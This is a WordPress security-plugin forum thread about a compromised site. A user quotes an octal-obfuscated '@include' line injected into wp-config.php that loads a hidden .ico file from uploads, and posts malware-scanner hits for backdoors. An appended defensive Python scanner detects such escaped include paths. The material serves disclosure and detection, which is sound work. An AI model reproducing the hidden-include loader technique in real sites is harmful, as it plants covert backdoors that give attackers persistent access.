BPS missed something odd Case 1

  • #38835
    BHA
    Participant

    So I noticed on one of my installs it missed the following in the wp-config.php. I just happened to stumble across it.

    <?php
    /*9ba70*/
    
    @include "\057home\064/boy\144hana\057publ\151c_ht\155l/th\145last\157utpo\163thaw\141ii/w\160-con\164ent/\165ploa\144s/20\0618/.6\071e36d\0621.ic\157";
    
    /*9ba70*/
    
    /**
    * The base configuration for WordPress
    *
    * The wp-config.php creation script uses this file during the
    * installation. You don't have to use the web site, you can
    * copy this file to "wp-config.php" and fill in the values.
    *
    * This file contains the following configurations:

    *

    #38837
    AITpro Admin
    Keymaster

    That code is definitely not standard.  Did you add it yourself at some point?  I’m pretty sure that adding an “include” in your wp-config.php file is going to cause header errors.

    #38839
    BHA
    Participant

    Nope, I didn’t do it. I contacted Bluehost to see if it was something they did. They said no and ran a malware scanner with the results below. Is there a way for BPS Pro to address this? I’m assuming the MSCAN is too out of date to catch this.

    If AIT Pro would like the files for analysis feel free to let me know.

     

    $WP_ROOT/wp-content/bps-backup/quarantine/wp-content/plugins/mojo-marketplace-wp-plugin/mojo-marketplace.php: SL-PHP-BACKDOOR-GENERIC-aqw.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/bps-backup/quarantine/wp-content/plugins/ap-extended-mime-types/moljkojr.php: SL-PHP-INJECTOR-1-evc.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/bps-backup/quarantine/wp-content/plugins/404-to-301/includes/lagpbzdc.php: SL-PHP-EVAL_REQUEST-awux.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/bps-backup/autorestore/wp-content/themes/twentynineteen/classes/nmczmsfs.php: SL-PHP-BACKDOOR-GENERIC-bds.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/bps-backup/autorestore/wp-content/themes/twentytwenty/inc/ejtyhkoq.php: SL-PHP-BACKDOOR-GENERIC-awp.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/plugins/jetpack/json-endpoints/class.wpcom-json-api-taxonomy-endpoint.php: SL-PHP-BACKDOOR-GENERIC-awq.UNOFFICIAL FOUND
    $WP_ROOT/wp-content/uploads/2019/.4c84f789.ico: SL-PHP-BACKDOOR-GENERIC-arj.UNOFFICIAL FOUND

    #38840
    AITpro Admin
    Keymaster

    Yeah it looks like your hosting account was already hacked before you purchased BPS Pro going by the date you purchased BPS Pro a few weeks ago.  BPS Pro is designed to protect your websites and hosting accounts from being hacked, but unfortunately once your hosting account/websites are already hacked then you need to do a hosting account hack clean up first.  I created a forum topic here on how to do that >  https://forum.ait-pro.com/forums/topic/wordpress-hacked-wordpress-hack-cleanup-wordpress-hack-repair/. I’d be glad to do that for you for a reasonable cost.  If you want to go that route then we can discuss a fair price.  You can use my contact form here > https://www.ait-pro.com/contact/
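
A defender-side check for the pattern shown in this thread, as an added example that is not part of any post or of BPS Pro: it finds `include`/`require` statements whose double-quoted path uses octal or hex escapes, decodes the path, and records when the target is a hidden, non-PHP file under `wp-content/uploads`. The function names, the reason labels and the sample input are assumptions constructed for illustration.

```python
import re
from pathlib import PurePosixPath

# PHP double-quoted string escapes: \NNN (octal, 1-3 digits) and \xHH (hex, 1-2 digits).
_ESCAPE = re.compile(r'\\([0-7]{1,3})|\\x([0-9A-Fa-f]{1,2})')
# include/require (optionally error-suppressed with @) taking a double-quoted literal.
_INCLUDE = re.compile(
    r'@?\s*\b(include|require)(_once)?\b\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.I)

def decode_php_escapes(literal):
    """Resolve octal/hex escapes the way PHP does inside double quotes."""
    def repl(m):
        code = int(m.group(1), 8) if m.group(1) else int(m.group(2), 16)
        return chr(code & 0xFF)  # PHP wraps octal values above \377 to one byte
    return _ESCAPE.sub(repl, literal)

def suspicious_includes(php_source):
    """Return (line_no, decoded_path, reasons) for includes that hide their target."""
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), 1):
        for m in _INCLUDE.finditer(line):
            raw = m.group(3)
            path = decode_php_escapes(raw)
            name = PurePosixPath(path).name
            reasons = []
            if _ESCAPE.search(raw):
                reasons.append("escaped-path")
            if not name.lower().endswith((".php", ".inc")):
                reasons.append("non-php-target")
            if name.startswith("."):
                reasons.append("hidden-file")
            if "/wp-content/uploads/" in path:
                reasons.append("uploads-dir")
            if "escaped-path" in reasons or len(reasons) >= 2:
                findings.append((line_no, path, reasons))
    return findings

# Constructed sample in the style of the injected line quoted in the thread.
SAMPLE = r'''<?php
/*00000*/
@include "\057var/ww\167/exa\155ple/wp-con\164ent/\165ploads/.de\155o.ic\157";
/*00000*/
require_once "wp-settings.php";
'''

if __name__ == "__main__":
    for line_no, path, reasons in suspicious_includes(SAMPLE):
        print(f"line {line_no}: {path} [{', '.join(reasons)}]")
```

The scan works line by line, so an include statement split across several lines is not matched.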
